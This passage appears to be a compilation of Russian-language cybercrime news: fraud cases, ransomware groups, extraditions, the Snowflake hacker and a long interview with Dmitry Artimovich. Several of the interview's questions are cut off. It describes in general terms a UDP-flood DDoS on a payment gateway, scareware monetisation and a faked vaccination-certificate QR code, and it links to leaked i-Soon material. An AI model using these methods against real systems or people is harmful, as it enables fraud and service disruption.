криптовалюты. Благодаря этому, обнаруженные у обвиняемого активы выведены из
цифровой среды, размер которых составил около 2 миллионов рублей. В настоящее
время решается вопрос об обращении полученных денежных средств в доход
государства.
Следователи также установили, что часть криптовалюты обвиняемый выводил через теневой криптообменник Bitok me. Помимо этого, в рамках международного сотрудничества с Российской Федерацией получена информация, подтверждающая факты открытия и последующего использования электронных кошельков, реквизиты доступа к которым реализовывал обвиняемый.
В период преступной деятельности фигурант и его семья ни в чем не нуждались, при этом никого из близких не интересовало, где глава семейства берет деньги для «красивой жизни».
При изучении личности обвиняемого установлено, что он зарегистрирован в качестве ИП, однако с 2018 свою деятельность не осуществляет. Что примечательно, чтобы отвести от себя подозрения и не быть изобличенным в совершении тяжкого преступления, мужчина уплачивал налоги как предприниматель. В поле зрения правоохранителей обвиняемый ранее не попадал.
Действия 40-летнего мужчины квалифицированы по ч.2 ст.222 (незаконный оборот средств платежа и инструментов, совершенный в особо крупном размере) Уголовного кодекса Республики Беларусь. Обвиняемый свою вину признал и раскаялся в содеянном.
Расследование уголовного дела завершено, материалы переданы прокурору для направления в суд.
Справочно: санкция данной статьи предусматривает максимальное наказание в виде 10 лет лишения свободы.
source: sk.gov.by/ru/news-ru/view/zarabotal-bolshe-2-millionov-na-prodazhe- akkauntov-rassledovanie-zaversheno-12280
Пенсионерка из Москвы стала жертвой масштабной мошеннической схемы, в результате которой лишилась крупной суммы денег. В начале декабря 83-летней женщине позвонил мужчина, представившийся сотрудником ФСБ, и заявил о якобы готовящемся переводе с её счетов в пользу ВСУ. «Следователь» предложил сотрудничать, и пенсионерка согласилась.
С 3 по 10 декабря она неоднократно снимала деньги со своих вкладов, а также со счетов мужа, и передавала наличные курьерам, представлявшимся сотрудниками ФСБ и Центробанка. Они назначали встречи во дворе её дома, при этом для «безопасности» отработали пароль «Зима». После последней передачи денег женщина уехала на дачу и там поняла, что стала жертвой аферы. По данным полиции, ущерб составил 146 миллионов рублей.
Однако, по информации человека, связавшегося с журналистами «Базы» и назвавшего себя исполнителем данной схемы, сумма была даже выше — около 165 миллионов рублей. Деньги общей массой 27 килограммов передавались курьерам по частям, затем обналиченные средства переводились через криптообменник.
Мошенник, якобы работающий в течение трёх лет в колл-центре в Днепре, утверждает, что ему 19 лет и за это время он заработал около полумиллиона долларов. На средства от подобных преступлений он приобрёл недвижимость и несколько люксовых автомобилей. По его словам, организаторы схемы делят деньги между собой по процентам: он, например, получает 7% от суммы, курьеры — 8% на всех. Часть средств уходит на подкуп местных силовиков и, как он утверждает, на поддержку ВСУ.
The Shanghai Anxun information hacker organization was exposed. Click here
https://github.com/I-S00N/I-S00N
https://mega.nz/file...umYkoiQMgmZrjfU
Владимир (имя изменено) в обычной жизни осмотрщик-ремонтник вагонов на Горьковской ж/д, а в мире криптовалюты — успешный майнер. Вложил в соло- майнинг 300 тысяч рублей для покупки хэшрейта и не прогадал — меньше чем за два дня добыл блок (обычно на эту работу уходит около 10 месяцев). Ресурс вознаградил парня на 6,7 ВТС (14–15 миллионов рублей).
Часть денег ушла на погашение ипотеки и кредитов. При выводе оставшихся 4,7 ВТС (около 10 миллионов рублей) случилось ужасное — деньги ушли на неизвестный счёт. Вова погрешил на вирус и пошёл в полицию в надежде, что ему вернут кровно намайненные.
Экс-сотрудник ФСБ рассказал о менталитете «русских хакеров» на примере REvil
Группировка REvil снова активно проводит атаки в сети — так утверждает ИБ- компания ReversingLabs. Однако другие специалисты уверены — еще до операции ФСБ хакеры ушли в подполье. В Group-IB считают, что пока о полной ликвидации хакеров говорить рано, а экс-сотрудник ФСБ раскрыл «Газете.Ru», почему «русских хакеров» не остановит тюрьма.
По данным ИБ-компании ReversingLabs, аресты предполагаемых участников киберпреступной группировки REvil, которых в международном сообществе часто причисляют к «русским хакерам», не повлияла на ее активность в сети.
Эксперты утверждают, что арест 14 ее предполагаемых участников в рамках операции ФСБ России никак не сказался на темпе атак. По их данным, после арестов число новых заражений в сутки увеличилось с 24 (169 в неделю) до 26 (180 в неделю).
Однако специалисты по информационной безопасности из других компаний
сомневаются, что данные ReversingLabs корректны. Они лишь признают, что REvil
не ликвидирована полностью.
Руководитель Лаборатории компьютерной криминалистики Group-IB Олег Скулкин
рассказал «Газете.Ru», что, по его данным, группировка REvil стала куда менее
активной. «Еще до арестов в России REvil и так не были активны уже несколько
месяцев. Но о полной ликвидации REvil, действительно, говорить пока рано», —
отметил он.
По его словам, у оставшихся на свободе на некоторое время могут возникнуть сложности с обналичиванием средств, полученных незаконным путем, но не более того.
Причина в том, что REvil активно работала по модели RaaS (Ransomware-as-a- Service), по которой разработчики продают или сдают в аренду вредоносное ПО своим партнерам для дальнейшего взлома сети и развертывания программ- вымогателей. Скулкин отметил, что деятельность REvil в таком формате — одна из основных причин впечатляющего роста рынка программ-вымогателей.
«Сейчас бывшие партнеры REvil могут временно прекратить свою деятельность или без проблем работать с другими партнерскими программами.
Так что, несмотря на обеспокоенность киберпреступного сообщества ситуацией с REvil, атаки представителей других партнерских программ продолжатся — это факт», — констатировал ИБ-специалист.
ИБ-эксперт Виталий Кремез из Advanced Intel согласился, что сейчас REvil не так активна, как раньше. По его словам, ReversingLabs некорректно поступили, опубликовав материал о росте активности, так как никакой деятельности группировки хакеров на таком уровне уже давно нет.
Эксперты из MalwareHunterTeam также уверены, что REvil снизила свою активность еще до арестов, подтверждая слова Скулкина из Group-IB.
Бывший сотрудник отдела по борьбе с оргпреступностью УФСБ по Москве и Московской области Александр Беляев сообщил «Газете.Ru», что даже после операции ФСБ хакеры, использующие вымогательское ПО от REvil, продолжат деятельность группировки.
«Стойкость эффекта таких операций по пресечению деятельности хакерских группировок — это тот срок, который люди проводят вне интернета. По сути на время заключения. Осудили на три года, после этого хакер выходит и принимается опять за свое», — отметил он.
По мнению специалиста, даже если условия в месте лишения свободы были «идеальными», и хакер не получал никакой новой информации о технологиях взлома и о новом ПО, ему понадобится совсем немного времени для восстановления пробела в знаниях.
«В течение трех месяцев человек в состоянии восстановить свои компетенции и поднять свой уровень знаний до полной готовности к совершению новых киберпреступлений», — констатировал Беляев.
Экс-сотрудник ФСБ рассказал, что задержанных членов REvil не остановит угроза нового тюремного срока.
«Это вопрос экономики. Переучиваться на другую профессию нет резона. Финансовый КПД в сфере IT превышает почти любую другую. Затраты тоже практически равны нулю, нужно только электричество. Так что почти всегда те, кто совершал киберпреступления, будут и дальше заниматься тем же самым», — заметил Беляев.
По его мнению, исправительная система не в состоянии помочь этим людям кардинально, так как они «пришли к идее о совершении преступлений в трезвом уме и ясной памяти».
«Если человек продолжает противоправную деятельность в сети в течение года и его никто не привлек к ответственности, у него меняется менталитет. И отношение к преступлениям.
Он перестает осознавать эти действия, как противоправные, как то, что должно заставлять ворочаться совесть. Это уже профессиональный закоренелый преступник», — заключил специалист.
Однако эксперт считает, что операция ФСБ в отношении REvil помогает минимизировать атаки со стороны группировки.
«Все киберпреступления проводят люди, поэтому, безусловно, задержание и привлечение к уголовной ответственности и лишение конкретных хакеров возможности осуществлять свои действия, решает вопрос повышения уровня киберзащиты», — отметил он.
Он также привел в качестве довода то, что ни одна преступная группировка никому не отдаст даром те наработки, что ей приносили деньги, поэтому разработки REvil вряд ли уйдут целиком и полностью кому-то еще. Плюс, добавил Беляев, сфера киберпреступности требует высокой квалификации каждого участника деятельности. Соответственно, не каждый хакер будет способен реализовать то, что осуществляла REvil.
Пейтер Затко, более известный как хакер Мадж, возглавил службу безопасности
Twitter. На сервис микроблогов летом произошла атака, были взломаны страницы
Билла Гейтса и Илона Маска.
Пейтер Затко, известный по хакерскому псевдониму Мадж (Mudge), возглавил
службу безопасности сервиса микроблогов Twitter. Об этом в понедельник, 16
ноября, сообщило агентство Reuters. Затко уже прокомментировал назначение,
заявив, что будет отвечать за "информационную безопасность", "целостность
платформы" и [защиту от "злоупотреблений и
манипуляций"](https://www.dw.com/ru/все-больше-немцев-становятся-жертвами-
киберпреступников-как-защитить-себя/a-41112183). Последнее место работы Затко
– платежный сервис Stripe.
В конце восьмидесятых и в девяностых годах Затко был одним из известнейших хакеров в США и входил в группировку "Культ мертвой коровы" ("Cult of the Dead Cow"). В начале девяностых он одним из первых хакеров установил контакты с американским правительством и частными компаниями, выступая от лица хакерского сообщества.
Атака на Twitter
В июле произошла [масштабная хакерская атака](https://www.dw.com/ru/masshtabnuju-hakerskuju-ataku-na-twitter-mog- organizovat-podrostok/a-54399965) на Twitter. Были [взломаны](https://www.dw.com/ru/взлом-twitter-хакеры-получили-доступ-к- личным-данным-пользователей/a-54226224) страницы нескольких американских корпораций и известных людей, в том числе Илона Маска, Билла Гейтса, Джеффа Безоса, Уоррена Баффера и Джозефа Байдена. В опубликованных от имени этих людей сообщениях хакеры призывали переводить им средства в криптовалюте на указанный счет и обещали вернуть сумму в двойном размере. Таким образом они получили более 100 тысяч долларов.
махинациях
Правоохранительные органы Таиланда экстрадировали гражданина РФ Дмитрия Украинского, выдачи которого также добивалась Россия, в США, сообщил РИА Новости вице-президент российского отделения Международного комитета защиты прав человека Иван Мельников.
В феврале 2019 года уголовный суд Бангкока разрешил выдать Штатам Украинского, хотя до этого в отношении россиянина уже было постановление об экстрадиции в РФ. Такое решение суда стало первым "двойным" решением об экстрадиции в истории таиландской юриспруденции.
"Шестнадцатого июня гражданин России Дмитрий Украинский был экстрадирован из Таиланда, несмотря на наличие двух противоречащих друг другу судебных решений Королевства Таиланд о его выдачи в США и одновременно в Россию, а также отсутствия дополнительного судебного разбирательства в обстановке крайней секретности, которая более была похожа на похищение", - рассказал правозащитник.
Украинского арестовали в Паттайе в июле 2016 года по американскому предварительному запросу на его экстрадицию. В США его обвинили в кибермошенничестве, хакерстве и отмывании денег в составе преступной группы. Также против него возбудили дело по обвинению в отмывании денег и в рамках таиландского законодательства. Позже суд в Таиланде приговорил Украинского к 10 годам тюрьмы. Согласно принципу приоритета местных законов над экстрадиционными, он сперва должен был отбыть срок в Таиланде. Россиянин подпал под несколько амнистий, в результате чего его тюремный срок официально окончился в ноябре 2021 года.
Мельников рассказал, что родных Украинского, а также консульских работников не уведомили о его экстрадиции в США, хотя, согласно консульской конвенции, американские власти обязаны были это сделать в течение 1-3 дней.
"Консульство России должно было быть немедленно проинформировано о задержании и местонахождении господина Украинского, что не было своевременно сделано и, в свою очередь, привело к крайней обеспокоенности членов его семьи и нарушению его прав на предоставление консульской помощи и права на юридическую помощь и защиту и создаёт предпосылки для предположений об оказании на него со стороны ряда сотрудников правоохранительных органов США неправомерного давления", - добавил собеседник.
По информации источника РИА Новости в пенитенциарной системе Таиланда, Украинский был передан американским властям в середине июня по решению генеральной прокуратуры страны – оно было принято, скорее всего, в начале месяца.
В отношении россиянина было два равнозначных судебных решения, разрешающих экстрадицию в РФ и США, так как запросы поступили из обеих стран. Окончательное решение об экстрадиции по таиландским законам принимает генпрокуратура.
"В постановлении генпрокуратуры было сказано, что, так как запрос от США поступил раньше, чем запрос от России, принято решение экстрадировать Дмитрия Украинского в США, чтобы после окончания его отношений с американским правосудием власти США могли бы передать его России", - добавил источник.
Запрос России на экстрадицию Украинского основывается на деле о мошенничестве (ч. 4 ст. 159 УК РФ) на сумму 7,5 миллиона рублей, совершенном группой лиц в Москве в 2013 году.
source: ria.ru/20220622/ekstraditsiya-1797248725.html
На форуме Reddit появилось сообщение пользователя о том, что его компьютер взломали и он потерял доступ к кошельку, где хранилось $240 000. Один из «белых хакеров» помог ему сохранить $117 000.
В своем сообщении пользователь рассказал, что подвергся фишинговой атаке, в ходе которой хакеры получили доступ к кошельку MetaMask. Конечно, многие удивились и подвергли критике пользователя за то, что хранит такие средства не на аппаратном, а программном кошельке. Но были и пользователи, которые посочувствовали ему и направили на сайт «белых хакеров».
Этот сайт создали люди, «неравнодушные к проблемам других людей». И запрос пользователя под псевдонимом 007happyguy попал к бывшему исследователю блокчейна в компании ZenGo Алексу Манушкину (Alex Manuskin), который и помог пользователю остановить опустошение кошелька.
Манушкин сначала убедился, что кошелек действительно принадлежит пользователю, а затем попросил закрытый ключ от кошелька. Чтобы остановить опустошение кошелька, он вывел оттуда все ETH и запустил скрипт, который автоматически выводит все поступающие ETH с кошелька.
Для оплаты комиссий за транзакции используется эфир, и, если на кошельке совсем нет этих монет, то злоумышленник не сможет выводить оставшиеся токены. После этого, с помощью сервиса Flashbot, он вывел оставшиеся токены. Сервис позволяет направлять транзакции напрямую майнерам, а комиссии оплатить со стороннего кошелька.
По словам Манушкина, весь процесс занял у него 5-6 часов. Это была интересная «битва» со злоумышленником, потому что борьба велась в режиме реального времени. Он подчеркнул, что это была «сложная и напряженная борьба».
В связи с угрозой коронавируса суд отменил экстрадицию гражданина Эстонии Павла Цуркана в США, пишет Eesti Ekspress.
Это была беспрецедентная победа адвоката Эве Финк.
Власти США обвиняют 32-летнего гражданина Эстонии Павла Цуркана в киберпреступлениях. Центральная криминальная полиция задержала его осенью прошлого года, однако высылка не состоялась благодаря умелой тактике Финк.
3 сентября этого года правительство Юри Ратаса все же одобрило экстрадицию Цуркана, но Финк обратилась в Таллиннский административный суд и в прошлую пятницу получила решение об аннулировании решения о высылке.
Главным ее аргументом Финк стало то, что высылка ее клиента в США, где свирепствует коронавирус, может поставить под угрозу здоровье и даже жизнь ее клиента. Адвокат отметила, что на пресс-конференции, состоявшейся в день принятия решения об экстрадиции, министр иностранных дел Урмас Рейнсалу рекомендовал воздержаться от поездок в какие-либо зарубежные страны. Как подтвердил семейный врач Цуркана, мужчина принадлежит к группе риска Covid-19. По мнению Цуркана, его выдача США равнялась бы смертной казни.
Суд отметил, что правительство при принятии решения об экстрадиции совсем не учло медицинский фактор. Если правительство не согласно с решением суда, оно может его оспорить.
Согласно подозрению прокуратуры США, что Павел Цуркан и его подельник Олег Кошкин занимались шифровкой компьютерных вирусов за деньги. Их сервисом Crypt4U пользовались киберпреступники, которым нужно было заразить компьютерные сети вирусом. Известный хакер Петр Левашов, который был осужден в Америке в прошлом году, с 2014 по 2017 гг платил за услуги Crypt4U около 3000 долларов в месяц.
Киберследователи ФБР обнаружили переписку, в которой Левашова консультировал некто Russian8. После ареста в прошлом году Цуркан подтвердил Центральной криминальной полиции Эстонии, что это он скрывался под данным ником.
• Source: [https://ekspress.delfi.ee/kuum/kube...ne-usa-le-vorduks- surmanuhtlusega?id=91402223](https://ekspress.delfi.ee/kuum/kuberkuriteos- suudistatav-minu-valjaandmine-usa-le-vorduks-surmanuhtlusega?id=91402223)
В последние месяцы наблюдается рост интернет-мошенничества. Сфера разрослась так сильно, что внутри неё образовалась целая прослойка людей, которые сами являются жертвами: как оказалось, к продвижению мошеннических криптоинвестиций принуждают подневольников.
Недавно полиция Филиппин арестовала по меньшей мере 12 участников синдиката, члены которого заманивали на острова иностранцев (в основном из Вьетнама и Китая), обещая им трудоустройство, бесплатные авиабилеты и проживание. Однако после прибытия в страну паспорта мигрантов конфисковали, а их самих заселяли в переоборудованные кондоминиумы, заставляя работать до 18 часов в день с удержанием зарплаты.
Работники были обучены заманивать незнакомцев в покупку криптоактивов. «Мы находим соотечественников в Tinder, Facebook и Instagram», — рассказывает один из скамеров-невольников, — «после того, как цель доверится нам, мы заставляем её инвестировать в криптовалюту. Если это не удаётся, нас наказывают».
В ходе последнего рейда на один из таких центров содержания 7 мая полиция освободила 1090 человек, взятых в плен для онлайн-мошенничества.
Отбывая срок в исправительном учреждении города Конотоп Сумской области, мужчина организовал прибыльный «интернет-бизнес»: он размещал на популярном сайте OLX объявления о продаже автомобилей и под разными предлогами, добивался от покупателей предоплаты.
Первой «успешной сделкой» стала продажа в январе нынешнего года несуществующего автомобиля Wolksvagen Caddy, стоимостью 196 тысяч гривен. Воодушевленный успехом предприятия, мошенник выставил следующее объявление о микроавтобусе Renault Traffic, однако на этот раз покупатель осторожничал и согласился перечислить на указанную карту только 8,9 тыс. грн.
Одновременно, заключенный разместил объявление о продаже Opel Vivaro, которого он также не имел в наличии. Сочинив легенду о том, что автомобиль только что пригнан из Европы, преступник сумел заполучить от очередной жертвы 7750 гривен под предлогом оплаты услуг растаможки автомобиля. Еще 2 объявления о продаже буса «Опель» принесли мошеннику 27 и 8 тысяч гривен.
На основании заявлений потерпевших, было возбуждено уголовное расследование (№ 12020140310000026 ЕРДР). Получив разрешение суда на временный доступ к данным банков и мобильных операторов, правоохранители вычислили подозреваемого.
Проведя обыск в камере мошенника, следователи обнаружили и изъяли мобильные телефоны и SIM-карты, при помощи которых размещались объявления о продаже автомобилей, а также ноутбук, в котором хранилась информация о потерпевших, а также данные «черной бухгалтерии». Как удалось выяснить правоохранителям, все заработанные преступным путем деньги, злоумышленник успел потратить.
Узнав о предстоящем обыске, заключенный успел повредить ноутбук, при помощи которого он фальсифицировал документы для обмана потерпевших. Во время допроса, мошенник не стал признавать вины, заявив, что не имеет отношения к торговле автомобилями, а также не раскрыл своих соучастников. Учитывая, что обыск произошел незадолго до официального срока освобождения, преступник отпирался, рассчитывая выйти на свободу, а не заработать очередной срок.
Однако, учитывая факт препятствия расследованию и то, что он проживет в другом регионе и не имеет прочных социальных связей, правоохранители побоялись, что после выхода на свободу, подозреваемый просто ударится в бега. Поэтому они добились, чтобы вместо освобождения из тюрьмы, мошенник был снова взят под стражу на время проведения расследования, по результатам которого, ему неминуемо светит новый срок по статье 190 УК (мошенничество).
Москвич поддался на уговоры мошенников и оформил миллионный кредит. Мошенники не оставили его в покое и довели до суицида.
Пообещав 61-летнему пенсионеру из Москвы большую прибыль от выгодных инвестиций, мошенники вынудили его взять кредит на сумму 3,5 миллиона рублей. Мотивировали мужчину тем, что денежные средства будут вложены в «Международный валютный фонд» под проценты.
После получения кредита потерпевшим, аферисты оказали на него давление с целью завладения квартиры, мотивируя необходимостью погашения займа.
Переоформив квартиру, пенсионер отправил СМС сообщение жене непонятного ей содержания. Женщина вызвала наряд полиции по месту жительства мужа.
Наряд обнаружил тело мужчины в ванной. По факту происшествия проводится проверка. Выясняются все обстоятельства случившегося.
Действующие лица:
1.«Waifu» 25 летний парень и хакер, который взломал Snowflake в 2024 году,
жертвами взломала стали не менее 165 клиентов этой компании, он украл
чертовски много важных данных клиентов, в том числе и их учетки.
2. Эллисон Никсон совладельца Unit221B занимается более 10 лет расследованиям
инцидентов связанных с киберпреступностью, в том числе и рансомов. Девочка
кстати красивая.
~~Кстати забавная пасхалка, но unit221b отсылает нас к квартире Шерлока
Хомса.~~
За несколько месяцев до полного расскрытия личности Вайфу хвастался своими
успехами, рассказывал какой он крутой перец и даже угрожал некоторым пользакам
в телеге, одним из таких пользаков оказалась Эллисон. Всего за несколько
месяцев персданные Вайфу оказались на руках у Unit221B.
Хоть она и не расскрыла, как именно эти данные были получены. Я считаю, что
кто-то из ее компании внедрился в The Com, это к слову коммьюнити вайфу и
оказался очень близок к нему.
«Зачем ему нападать на компанию, которая не работает над его делом и
специализируется на выявлении киберпреступников?» — сказала Никсон.
Сама же Никсон говорит, что за более чем 10 летний опыт работы они не видела
более глупого киберпреступника.
Я немного поресерчила этот инцидент, пострадали многие, так что самого Вайфу
врятли можно назвать глупым. Как пример.
" Среди целевых компаний были крупные корпорации, такие как Advance Auto
Parts, AT&T, LendingTree, Neiman Marcus, Santander и Ticketmaster (Live
Nation).
В некоторых инцидентах злоумышленники пытались вымогать деньги у компаний,
угрожая продать украденные данные на криминальных форумах, если они не
заплатят. AT &T, согласно данным WIRED, якобы заплатила хакерам 370 000
долларов за удаление украденных данных.
Атаки проводились с использованием украденных учетных данных клиентов,
полученных через предыдущие инфекции с использованием кражи данных, для
получения начального доступа. В ходе расследования также было установлено, что
первоначальная компрометация произошла на системах подрядчиков,
использовавшихся для загрузки игр и пиратского программного обеспечения. "
Все же не угрожайте сосинтерам и кибербезопасникам, будьте умнее и не будьте как Waifu, чтобы я однажды о вас не написала ироничный пост.
Дмитрий Артимович — один из самых известных на Западе русских хакеров. Именно он устроил DDoS-атаку платежного шлюза Assist, в результате которой «Аэрофлот» полторы недели не мог принимать оплату. Недавно Артимович написал книгу «Я — хакер! Хроника потерянного поколения», где раскрыл множество инсайдов. Даня Шеповалов прочитал ее, слегка ужаснулся некоторым скандальным подробностям и поговорил с Дмитрием о его непростом опыте.
Не забудь подписаться на телеграм‑канал Дани Шеповалова «Вечерний Даня», чтобы не пропускать новые авторские материалы, и заглядывай на danya.ru.
— Шестьдесят тысяч ботов одновременно стали слать UDP-пакеты без какого‑либо содержания на IP-адрес шлюза. UDP вытеснил все легитимные пакеты, и шлюз перестал быть доступен. Иногда переключались на TCP-флуд, но тут уже нужно сначала установить соединение, чтобы туда отправить мусор. Классического GET- флуда по HTTPS не было, слишком проблематично было реализовывать SSL под ядро ОС. А UDP-флуд просто забивал канал полностью. Оказалось, что у платежного шлюза канал был чуть ли не 10 Мбит/с всего.
— Несколько дней сами, потом привлекли «Лабораторию Касперского». С горем пополам через десять дней отбили атаку.
— Это надо Врублевского спрашивать. Видимо, потому, что это крупный государственный объект и должен охраняться Центром информационной безопасности (ЦИБ) ФСБ, который хотел дискредитировать господин Врублевский.
закончится? Зачем вообще ввязался в эту затею?
— Даже не возникало мыслей, что это незаконно. На тот момент мы с братом сильно зависели финансово от господина Врублевского, он финансировал разработку нашей фарма‑партнерки. Плюс для меня это тогда был некий авторитет (после статьи Форбса «Плохие парни русского интернета»). Поэтому понимал, что, с одной стороны, раз этот человек смог заработать кучу денег, значит, есть чему поучиться у него, с другой стороны, отказались бы — задвинул бы нас на второй план.
прочих спорных с точки зрения закона вещах…
— Спам у нас не считается уголовно наказуемым, а на Западе об этом и так знали. Михайлов все это давно слил, а Кребс опубликовал. Да и срок давности там прошел. А за создание ботнета я тут получил срок. Так что я чист перед законом.
— Первые две недели в нашем «поселке строгого режима» (его так называли за то, что никого не отпускали жить в город, а построения проводили по четыре раза в день). На меня тогда пытался давить местный блаткомитет, каждый вечер тянули «пообщаться», постоянно пытались зацепить. Придрались к телефону, якобы я его вытащил без их разрешения в лагерь, и прописали за это в ухо. Но в итоге эту ситуацию мы разрулили.
— Я их не спрашивал. Эта переписка не включает в себя тайну семейной или личной жизни, значит, не нарушает закон. Я даже просил своего юриста вычитать текст, чтобы не было поводов.
фига». Можешь рассказать подробнее про spyware? Как конкретно ей занимались, как зарабатывали и так далее?
— Про это Кребс много писал. Scareware — пугалка, маскирующаяся, например, под антивирус. Это такой вредонос, который спит после попадания на ПК какое‑то время, потом выскакивает и представляется, например, антивирусом. Естественно, находит штук 20–30 разных троянов на компе и предлагает их вылечить за покупку подписки баксов в пятнадцать. Здесь весь вопрос утыкался в процессинг, не каждый банк готов был принимать платежи за откровенное мошенничество. Плюс по таким мерчантам всегда был повышенный уровень фрода, который контролируется платежными системами. В общем, тут самое трудное было не сделать такой вредонос, а сделать прием карт под него.
— Судя по всему, никак. Я не встречал такого в последнее время. После ареста господина Врублевского в 2011 году, по сути, отрасль умерла. Банки, которые принимали такие платежи, попали под засветку и сейчас изображают из себя белых и пушистых.
— Фарма‑партнерки, продававшие индийскую виагру. В общем, это был основной инструмент конвертации тогда спама как почтового, так и поискового. Rx- Promotion в свое время проводила вечеринки, на одной из них даже разыграли слиток золота. А вот последняя их вечеринка закончилась плохо — визитом ФСКН.
— Не первым. Я не знаю точной истории. Только слухи. Знаю, что изначально партнером Врублевского был тот самый Гусев (desp), который нас с братом слил в ФСБ.
ничего не понимает в эквайринге и финансовых расчетах. Если сесть и основательно в этом разобраться, можно с улицы зайти на рынок с новой платежной системой?
— Продажи же у нас построены на личных связях. Игроков на рынке слишком много, поэтому технически или даже ставкой сейчас никого не удивишь. Клиентов забирают вместе с сейлзами. Что, кстати, в тех же США незаконно.
больше всего запомнилось?
— На спам‑доте были статусы Trusted — за таких людей должны были поручиться два других участника (с таким же статусом), и они несли за их действия (тех, за кого поручились) финансовую ответственность.
гордишься больше всего?
— Я бы сказал так, больше всего фана в последнее время мне доставило сделать фейковый QR-код сертификата вакцинации. Тут особо хакерского‑то и нету ничего, идея из фишинга (создается клон Госуслуг СЕРТИФИКАТ ДЕЙСТВИТЕЛЕН, и записывается в QR-код).
— Восхищался, как был написан спам‑бот Srizbi (Reactor Mailer), который работал с сетью на самом низком уровне, фактически сам реализовал стек протоколов TCP/IP.
— Я не слежу за ними. Как‑то свободного времени на это нет. Плюс большая часть таких вот хакерских групп — просто фейки от спецслужб. Вербуют сотрудника какой‑то компании (партии и так далее), его руками скачивают документы, а потом выкидывают их в сеть и обыгрывают, как будто какой‑нибудь «Анонимус» взломал и слил в сеть секретные данные.
— Думаю, что его дело напрямую связано с делом Сережи Михайлова, что, скорее всего, они на пару сливали данные по россиянам в Штаты. Михайлова посадили, а до Сачкова не дошло, что нужно прекратить стучать на Запад. Сачков же проводил экспертизу по делу «Аэрофлота» на взятку от Гусева.
главной NYTimes.com ты стал одним из самых известных русских хакеров на Западе. Мешает или, наоборот, помогает эта репутация?
— Да всем плевать, по сути. Вообще никак не отразилось. Только куча журналистов наших и зарубежных хотела услышать от меня фразу «Мы выбрали Трампа по заказу Кремля». Да Кремль о нас даже и не знает. После того как я уволился из ChronoPay, работу мне предложил только мой друг Руслан Маннанов в RBK.Money. Это был единственный случай.
[How Russia Recruited Elite Hackers for Its Cyberwar](https://www.nytimes.com/2016/12/29/world/europe/how-russia- recruited-elite-hackers-for-its-cyberwar.html)
не нужны, то им-то, похоже, пригодятся.
— Насколько я понимаю, западные спецслужбы и работали с русскими хакерами через Михайлова. Он тогда возглавлял оперативный отдел ЦИБ ФСБ, как раз он и вербовал хакеров. А Запад давал задания, что сделать, например подбросить улики выборов хакерами Трампа. При этом во всем виноваты русские. Очень удобно. Сейчас эта связь разорвана, а в западные страны я не езжу.
А что еще вдохновляло?
— Статья в Forbes «Плохие парни русского интернета». Правда, как оказалось, плохой был пример. После знакомства с тем же RedEye меня до сих пор преследуют неприятности.
— Фильм «Хакеры» 1995 года. Там, конечно, очень много визуально приукрашено, но дух того времени передан хорошо.
конфигурации, чтобы, когда отберут, не было жалко. А сейчас же у тебя забрали технику? Что за ноут?
— В марте этого года у меня забрали три ноутбука: мой рабочий HP EliteBook x360 1040 G7 (Intel Core i7 10710U, 1,1–4,7 ГГц, 32 768 Мбайт, 14" Full HD 1920 × 1080, 1000 Гбайт SSD) и два старых HP EliteBook’а (один из них супруги). Выгребли из сейфа все сбережения и тоже забрали их. При этом руководитель группы обыска звонил Евгению Морозову (следователь, который ведет дело) и спрашивал: точно ли забирать деньги? Потому что меня, как и восемнадцать других человек, привлекли к уголовному делу против Врублевского как свидетеля. Если ноутбуки хоть как‑то можно обосновать (экспертиза), то забирать деньги у свидетеля незаконно. В общем, я получил том уголовного дела. Конечно, я не могу разглашать сведения предварительного следствия, но оснований для обыска у меня не было никаких. При этом от меня очень хотели пароли от ноутбуков. А сам Морозов уверял меня, что, если найдет крипту на моих дисках, ее никто не тронет, а деньги он обещал вернуть сразу же. Прошло уже четыре месяца, следователь отказывается возвращать деньги. Мы сейчас это в суде обжалуем, а суд даже отказывается принять заявление к производству. Апелляцию по обыску Мосгорсуд вообще потерял — не могут найти документы. Какие‑то чудеса. С техникой сложнее. Купить ноутбук сейчас такого класса в РФ практически невозможно — их просто нет. Абсолютно уверен (тем более я видел том уголовного дела), что дело заказное. Полагаю, у следователя есть интерес к моим конфискованным деньгам. Полагаю, он хотел поставить меня в безвыходное положение (кроме ноутбуков, они забрали все бэкапы — это как они думают) и заставить с ним общаться. Дальше прописать на попытке дать взятку и забрать вообще все. Но я же не такой дурак, каким был десять лет назад. Бэкапы я не только дома держу. Но вот у господина Морозова есть разрешение на обыск моего второго места пребывания. И я на полном серьезе считаю, что он может прийти еще раз. Я про него в книге написал и в интервью говорю. А он в отместку подчистит еще одну квартиру…
— Крипта не заменит фиатные деньги. Просто потому, что тогда государство потеряет контроль над эмиссией денег и расходами населения. Это при условии нормальной децентрализованной крипты, а не тех поделок в виде цифрового рубля, чем у нас ЦБ страдает ради хайпа. Какие могут быть перспективы? Американцы (а в мире пока господствует долларовая финансовая система) не позволят тому же биткоину стать средством платежа, они живут за счет эмиссии своего доллара.
внимание?
— Децентрализация, децентрализованные сети. Есть одна идея кое‑что сделать. Но технология эта не особенно‑то новая.
локальную сеть в общаге, программирование графики. Все, кому это хорошо знакомо, — потерянное поколение?
— Потерянное поколение — это те, кто уехал. Это умные ребята, которые не нашли себе здесь места, которые могли бы двигать науку или страну. Таких людей не так много. У нас в физико‑математическом классе математику знали единицы, а физику еще меньше. Отличников штамповали по приказу директора, чтобы держать марку лучшей школы района или даже области. В университете на моем курсе реально разбирающихся также мало было. Все, кто действительно учился, уехали в Европу. Вот они и есть то потерянное поколение.
Flipper Zero, криптостартапы и прочее?
— Разве что‑то сильно изменилось? Ты можешь привести много примеров прорывных IT-стартапов в России? Когда ребята в гараже собрались и сделали? У нас, по сути, есть только копии — Яндекс, VK, Mail.ru. Эти сервисы нужны были в первую очередь для государственной безопасности и получали соответствующее финансирование. Получить в России финансирование под свой проект фактически невозможно, кредитов для малого бизнеса тоже фактически нет. Ведь утечка мозгов продолжается. Мне нравится подход Сингапура в области образования и охоты за талантами. Тех, кто выделялся способностями, они отправляли обучаться за рубеж, а потом трудоустраивали в крупные корпорации, правительство. Так и выросла страна из третьего мира в первый.
— То, что я напрасно потерял два с половиной года.
решение, что бы ты изменил?
— Ничего.
threat actors flooded their forum gay orgy porn images
__https://twitter.com/x/status/1418549368806912006
At the end of June, the Babuk Locker ransomware was leaked online allowing threat actors to use it to create their own version of the popular ransomware.
